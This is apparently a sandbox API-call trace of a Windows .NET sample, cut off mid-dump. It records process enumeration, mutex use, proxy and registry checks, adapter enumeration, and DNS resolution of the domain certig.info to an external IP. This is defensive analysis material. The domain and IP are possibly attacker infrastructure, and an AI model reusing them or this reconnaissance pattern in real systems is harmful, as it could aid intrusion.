	[0188.526] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f6ea5c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f6ea5c*=0x434) returned 1
	[0188.526] GetLastError () returned 0x5
	[0188.526] CloseHandle (hObject=0x434) returned 1
	[0188.526] GetLastError () returned 0x5
	[0188.527] CloseHandle (hObject=0x430) returned 1
	[0188.527] GetLastError () returned 0x5
	[0188.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c4) returned 0x430
	[0188.527] GetLastError () returned 0x5
	[0188.527] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5f6eafc, lpExitTime=0x5f6eaf4, lpKernelTime=0x5f6eaf4, lpUserTime=0x5f6eaf4 | out: lpCreationTime=0x5f6eafc, lpExitTime=0x5f6eaf4, lpKernelTime=0x5f6eaf4, lpUserTime=0x5f6eaf4) returned 1
	[0188.527] GetLastError () returned 0x5
	[0188.527] CloseHandle (hObject=0x430) returned 1
	[0188.527] GetLastError () returned 0x5
	[0188.527] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x8c4) returned 0x430
	[0188.527] GetLastError () returned 0x5
	[0188.527] GetCurrentProcess () returned 0xffffffff
	[0188.527] GetLastError () returned 0x5
	[0188.527] GetCurrentProcess () returned 0xffffffff
	[0188.527] GetLastError () returned 0x5
	[0188.528] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f6ea5c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f6ea5c*=0x434) returned 1
	[0188.528] GetLastError () returned 0x5
	[0188.528] CloseHandle (hObject=0x434) returned 1
	[0188.528] GetLastError () returned 0x5
	[0188.528] CloseHandle (hObject=0x430) returned 1
	[0188.528] GetLastError () returned 0x5
	[0188.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x430
	[0188.528] GetLastError () returned 0x5
	[0188.528] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5f6eafc, lpExitTime=0x5f6eaf4, lpKernelTime=0x5f6eaf4, lpUserTime=0x5f6eaf4 | out: lpCreationTime=0x5f6eafc, lpExitTime=0x5f6eaf4, lpKernelTime=0x5f6eaf4, lpUserTime=0x5f6eaf4) returned 1
	[0188.528] GetLastError () returned 0x5
	[0188.529] CloseHandle (hObject=0x430) returned 1
	[0188.529] GetLastError () returned 0x5
	[0188.529] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x7cc) returned 0x430
	[0188.529] GetLastError () returned 0x5
	[0188.529] GetCurrentProcess () returned 0xffffffff
	[0188.529] GetLastError () returned 0x5
	[0188.529] GetCurrentProcess () returned 0xffffffff
	[0188.529] GetLastError () returned 0x5
	[0188.529] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f6ea5c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f6ea5c*=0x434) returned 1
	[0188.529] GetLastError () returned 0x5
	[0188.529] CloseHandle (hObject=0x434) returned 1
	[0188.530] GetLastError () returned 0x5
	[0188.530] CloseHandle (hObject=0x430) returned 1
	[0188.530] GetLastError () returned 0x5
	[0188.530] ReleaseMutex (hMutex=0x424) returned 1
	[0188.532] GetLastError () returned 0x5
	[0188.532] CloseHandle (hObject=0x424) returned 1
	[0188.532] GetLastError () returned 0x5
	[0188.533] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b17668, cbSid=0x5f6eb44 | out: pSid=0x2b17668*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5f6eb44) returned 1
	[0188.533] GetLastError () returned 0x5
	[0188.533] CreateMutexW (lpMutexAttributes=0x2b17778, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.533] GetLastError () returned 0x5
	[0188.533] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.533] GetLastError () returned 0x5
	[0188.534] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.563] GetLastError () returned 0x5
	[0188.564] ReleaseMutex (hMutex=0x424) returned 1
	[0188.564] GetLastError () returned 0x5
	[0188.564] CloseHandle (hObject=0x424) returned 1
	[0188.564] GetLastError () returned 0x5
	[0188.564] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b17f04, cbSid=0x5f6eb44 | out: pSid=0x2b17f04*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5f6eb44) returned 1
	[0188.564] GetLastError () returned 0x5
	[0188.565] CreateMutexW (lpMutexAttributes=0x2b18014, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.565] GetLastError () returned 0x5
	[0188.565] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.565] GetLastError () returned 0x5
	[0188.565] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.567] GetLastError () returned 0x5
	[0188.567] ReleaseMutex (hMutex=0x424) returned 1
	[0188.567] GetLastError () returned 0x5
	[0188.567] CloseHandle (hObject=0x424) returned 1
	[0188.567] GetLastError () returned 0x5
	[0188.568] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b187b0, cbSid=0x5f6eb44 | out: pSid=0x2b187b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5f6eb44) returned 1
	[0188.568] GetLastError () returned 0x5
	[0188.569] CreateMutexW (lpMutexAttributes=0x2b188c0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.569] GetLastError () returned 0x5
	[0188.569] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.569] GetLastError () returned 0x5
	[0188.569] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.571] GetLastError () returned 0x5
	[0188.571] ReleaseMutex (hMutex=0x424) returned 1
	[0188.572] GetLastError () returned 0x5
	[0188.572] CloseHandle (hObject=0x424) returned 1
	[0188.572] GetLastError () returned 0x5
	[0188.572] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b19054, cbSid=0x5f6eb44 | out: pSid=0x2b19054*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5f6eb44) returned 1
	[0188.572] GetLastError () returned 0x5
	[0188.573] CreateMutexW (lpMutexAttributes=0x2b19164, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.573] GetLastError () returned 0x5
	[0188.573] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.573] GetLastError () returned 0x5
	[0188.574] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.576] GetLastError () returned 0x5
	[0188.576] ReleaseMutex (hMutex=0x424) returned 1
	[0188.577] GetLastError () returned 0x5
	[0188.577] CloseHandle (hObject=0x424) returned 1
	[0188.577] GetLastError () returned 0x5
	[0188.577] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b198f4, cbSid=0x5f6eb3c | out: pSid=0x2b198f4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5f6eb3c) returned 1
	[0188.577] GetLastError () returned 0x5
	[0188.578] CreateMutexW (lpMutexAttributes=0x2b19a04, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.578] GetLastError () returned 0x5
	[0188.578] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.578] GetLastError () returned 0x5
	[0188.578] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.580] GetLastError () returned 0x5
	[0188.581] ReleaseMutex (hMutex=0x424) returned 1
	[0188.581] GetLastError () returned 0x5
	[0188.581] CloseHandle (hObject=0x424) returned 1
	[0188.581] GetLastError () returned 0x5
	[0188.581] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b1a184, cbSid=0x5f6eb3c | out: pSid=0x2b1a184*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5f6eb3c) returned 1
	[0188.581] GetLastError () returned 0x5
	[0188.582] CreateMutexW (lpMutexAttributes=0x2b1a294, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.582] GetLastError () returned 0x5
	[0188.582] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.582] GetLastError () returned 0x5
	[0188.582] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.584] GetLastError () returned 0x5
	[0188.584] ReleaseMutex (hMutex=0x424) returned 1
	[0188.584] GetLastError () returned 0x5
	[0188.584] CloseHandle (hObject=0x424) returned 1
	[0188.585] GetLastError () returned 0x5
	[0188.585] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b1aa0c, cbSid=0x5f6eb3c | out: pSid=0x2b1aa0c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5f6eb3c) returned 1
	[0188.585] GetLastError () returned 0x5
	[0188.585] CreateMutexW (lpMutexAttributes=0x2b1ab1c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.585] GetLastError () returned 0x5
	[0188.585] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.586] GetLastError () returned 0x5
	[0188.586] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.587] GetLastError () returned 0x5
	[0188.588] ReleaseMutex (hMutex=0x424) returned 1
	[0188.588] GetLastError () returned 0x5
	[0188.588] CloseHandle (hObject=0x424) returned 1
	[0188.588] GetLastError () returned 0x5
	[0188.588] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b1b2a4, cbSid=0x5f6eb3c | out: pSid=0x2b1b2a4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5f6eb3c) returned 1
	[0188.588] GetLastError () returned 0x5
	[0188.589] CreateMutexW (lpMutexAttributes=0x2b1b3b4, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.589] GetLastError () returned 0x5
	[0188.589] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.589] GetLastError () returned 0x5
	[0188.589] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.591] GetLastError () returned 0x5
	[0188.591] ReleaseMutex (hMutex=0x424) returned 1
	[0188.591] GetLastError () returned 0x5
	[0188.591] CloseHandle (hObject=0x424) returned 1
	[0188.591] GetLastError () returned 0x5
	[0188.591] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b1bb34, cbSid=0x5f6eb3c | out: pSid=0x2b1bb34*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5f6eb3c) returned 1
	[0188.592] GetLastError () returned 0x5
	[0188.592] CreateMutexW (lpMutexAttributes=0x2b1bc44, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.592] GetLastError () returned 0x5
	[0188.592] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.592] GetLastError () returned 0x5
	[0188.592] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.593] GetLastError () returned 0x5
	[0188.593] ReleaseMutex (hMutex=0x424) returned 1
	[0188.593] GetLastError () returned 0x5
	[0188.593] CloseHandle (hObject=0x424) returned 1
	[0188.593] GetLastError () returned 0x5
	[0188.603] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x424
	[0188.603] GetLastError () returned 0x0
	[0188.604] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x430
	[0188.604] GetLastError () returned 0x0
	[0188.606] ioctlsocket (in: s=0x424, cmd=-2147195266, argp=0x5f6ed88 | out: argp=0x5f6ed88) returned 0
	[0188.606] GetLastError () returned 0x0
	[0188.611] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x434
	[0188.611] GetLastError () returned 0x0
	[0188.612] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x438
	[0188.612] GetLastError () returned 0x0
	[0188.612] ioctlsocket (in: s=0x434, cmd=-2147195266, argp=0x5f6ed88 | out: argp=0x5f6ed88) returned 0
	[0188.612] GetLastError () returned 0x0
	[0188.613] WSAIoctl (in: s=0x424, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5f6ed6c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5f6ed6c, lpOverlapped=0x0) returned -1
	[0188.614] GetLastError () returned 0x2733
	[0188.615] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x631588, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0188.621] GetLastError () returned 0x2733
	[0188.624] WSAEventSelect (s=0x424, hEventObject=0x430, lNetworkEvents=512) returned 0
	[0188.624] GetLastError () returned 0x0
	[0188.624] WSAIoctl (in: s=0x434, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5f6ed6c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5f6ed6c, lpOverlapped=0x0) returned -1
	[0188.624] GetLastError () returned 0x2733
	[0188.624] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x631588, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0188.624] GetLastError () returned 0x2733
	[0188.633] WSAEventSelect (s=0x434, hEventObject=0x438, lNetworkEvents=512) returned 0
	[0188.633] GetLastError () returned 0x0
	[0188.633] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x43c
	[0188.633] GetLastError () returned 0x0
	[0188.635] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x43c, param_3=0x3) returned 0x0
	[0188.670] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x5f6ed50 | out: phkResult=0x5f6ed50*=0x454) returned 0x0
	[0188.670] GetLastError () returned 0x0
	[0188.777] RegOpenKeyExW (in: hKey=0x454, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x5f6ed0c | out: phkResult=0x5f6ed0c*=0x468) returned 0x0
	[0188.778] GetLastError () returned 0x0
	[0188.778] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x46c
	[0188.778] GetLastError () returned 0x0
	[0188.779] RegNotifyChangeKeyValue (hKey=0x468, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x46c, fAsynchronous=1) returned 0x0
	[0188.779] GetLastError () returned 0x0
	[0188.780] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x5f6ed0c | out: phkResult=0x5f6ed0c*=0x470) returned 0x0
	[0188.780] GetLastError () returned 0x0
	[0188.780] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x474
	[0188.780] GetLastError () returned 0x0
	[0188.780] RegNotifyChangeKeyValue (hKey=0x470, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x474, fAsynchronous=1) returned 0x0
	[0188.781] GetLastError () returned 0x0
	[0188.781] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x5f6ed0c | out: phkResult=0x5f6ed0c*=0x478) returned 0x0
	[0188.781] GetLastError () returned 0x0
	[0188.781] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x47c
	[0188.781] GetLastError () returned 0x0
	[0188.781] RegNotifyChangeKeyValue (hKey=0x478, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x47c, fAsynchronous=1) returned 0x0
	[0188.781] GetLastError () returned 0x0
	[0188.781] GetCurrentProcess () returned 0xffffffff
	[0188.781] GetLastError () returned 0x3f0
	[0188.782] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6ecf4 | out: TokenHandle=0x5f6ecf4*=0x480) returned 1
	[0188.782] GetLastError () returned 0x3f0
	[0188.790] GetCurrentProcess () returned 0xffffffff
	[0188.790] GetLastError () returned 0x3f0
	[0188.790] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6e910 | out: TokenHandle=0x5f6e910*=0x484) returned 1
	[0188.790] GetLastError () returned 0x3f0
	[0188.794] GetCurrentProcess () returned 0xffffffff
	[0188.794] GetLastError () returned 0x3f0
	[0188.794] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6e920 | out: TokenHandle=0x5f6e920*=0x488) returned 1
	[0188.794] GetLastError () returned 0x3f0
	[0188.908] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x628ea0 | out: pProxyConfig=0x628ea0) returned 1
	[0189.874] GetLastError () returned 0x0
	[0189.882] SetEvent (hEvent=0x398) returned 1
	[0189.882] GetLastError () returned 0x0
	[0189.992] GetCurrentProcess () returned 0xffffffff
	[0189.992] GetLastError () returned 0x3f0
	[0189.992] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6e948 | out: TokenHandle=0x5f6e948*=0x4c8) returned 1
	[0189.992] GetLastError () returned 0x3f0
	[0189.995] GetCurrentProcess () returned 0xffffffff
	[0189.995] GetLastError () returned 0x3f0
	[0189.995] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6e958 | out: TokenHandle=0x5f6e958*=0x4cc) returned 1
	[0189.995] GetLastError () returned 0x3f0
	[0189.996] SetEvent (hEvent=0x398) returned 1
	[0189.996] GetLastError () returned 0x3f0
	[0190.049] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x5f6eca8 | out: pFixedInfo=0x0, pOutBufLen=0x5f6eca8) returned 0x6f
	[0190.407] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x63edc0
	[0190.407] GetLastError () returned 0x0
	[0190.407] GetNetworkParams (in: pFixedInfo=0x63edc0, pOutBufLen=0x5f6eca8 | out: pFixedInfo=0x63edc0, pOutBufLen=0x5f6eca8) returned 0x0
	[0190.504] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0190.504] GetLastError () returned 0x0
	[0190.514] LocalFree (hMem=0x63edc0) returned 0x0
	[0190.514] GetLastError () returned 0x0
	[0190.515] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e0
	[0190.516] GetLastError () returned 0x0
	[0190.516] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4dc
	[0190.516] GetLastError () returned 0x0
	[0190.520] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x5f6eb84*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5f6e918 | out: ppResult=0x5f6e918*=0x64d608*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x646098*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0191.169] GetLastError () returned 0x0
	[0191.171] FreeAddrInfoW (pAddrInfo=0x64d608*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o࠰Վ윍珱2蠀ᨀd忰d㙸U\x01", ai_addr=0x646098*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0191.171] GetLastError () returned 0x0
	[0191.172] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f0
	[0191.172] GetLastError () returned 0x0
	[0191.172] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e8
	[0191.172] GetLastError () returned 0x0
	[0191.172] ioctlsocket (in: s=0x4f0, cmd=-2147195266, argp=0x5f6eb68 | out: argp=0x5f6eb68) returned 0
	[0191.172] GetLastError () returned 0x0
	[0191.172] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f8
	[0191.173] GetLastError () returned 0x0
	[0191.173] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4fc
	[0191.173] GetLastError () returned 0x0
	[0191.173] ioctlsocket (in: s=0x4f8, cmd=-2147195266, argp=0x5f6eb68 | out: argp=0x5f6eb68) returned 0
	[0191.173] GetLastError () returned 0x0
	[0191.173] WSAIoctl (in: s=0x4f0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5f6eb4c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5f6eb4c, lpOverlapped=0x0) returned -1
	[0191.173] GetLastError () returned 0x2733
	[0191.173] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x631588, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0191.173] GetLastError () returned 0x2733
	[0191.173] WSAEventSelect (s=0x4f0, hEventObject=0x4e8, lNetworkEvents=512) returned 0
	[0191.174] GetLastError () returned 0x0
	[0191.174] WSAIoctl (in: s=0x4f8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5f6eb4c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5f6eb4c, lpOverlapped=0x0) returned -1
	[0191.174] GetLastError () returned 0x2733
	[0191.174] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x631588, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0191.174] GetLastError () returned 0x2733
	[0191.174] WSAEventSelect (s=0x4f8, hEventObject=0x4fc, lNetworkEvents=512) returned 0
	[0191.174] GetLastError () returned 0x0
	[0191.175] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x5f6eb48*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x5f6eb48*=0xa5c) returned 0x6f
	[0191.197] LocalAlloc (uFlags=0x0, uBytes=0xa5c) returned 0x6404f0
	[0191.197] GetLastError () returned 0x0
	[0191.197] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x6404f0, SizePointer=0x5f6eb48*=0xa5c | out: AdapterAddresses=0x6404f0*(Alignment=0xe00000178, Length=0x178, IfIndex=0xe, Next=0x6407b4, AdapterName="{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}", FirstUnicastAddress=0x640728, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) PRO/1000 MT Network Connection #2", FriendlyName="Local Area Connection 2", PhysicalAddress=([0]=0x0, [1]=0x1c, [2]=0x34, [3]=0xa2, [4]=0x42, [5]=0x2b, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000007000000, Dhcpv4Server.lpSockaddr=0x640668*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x20, [5]=0xc7, [6]=0x5c, [7]=0xa7, [8]=0xc4, [9]=0x3d, [10]=0xc7, [11]=0x58, [12]=0x4a, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, 